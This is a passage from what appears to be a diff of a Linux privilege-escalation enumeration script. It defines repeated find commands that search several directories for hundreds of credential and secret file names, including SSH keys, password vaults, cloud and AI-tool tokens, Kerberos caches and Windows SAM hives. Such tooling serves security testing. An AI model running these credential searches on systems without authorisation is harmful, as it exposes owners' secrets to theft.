\"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name 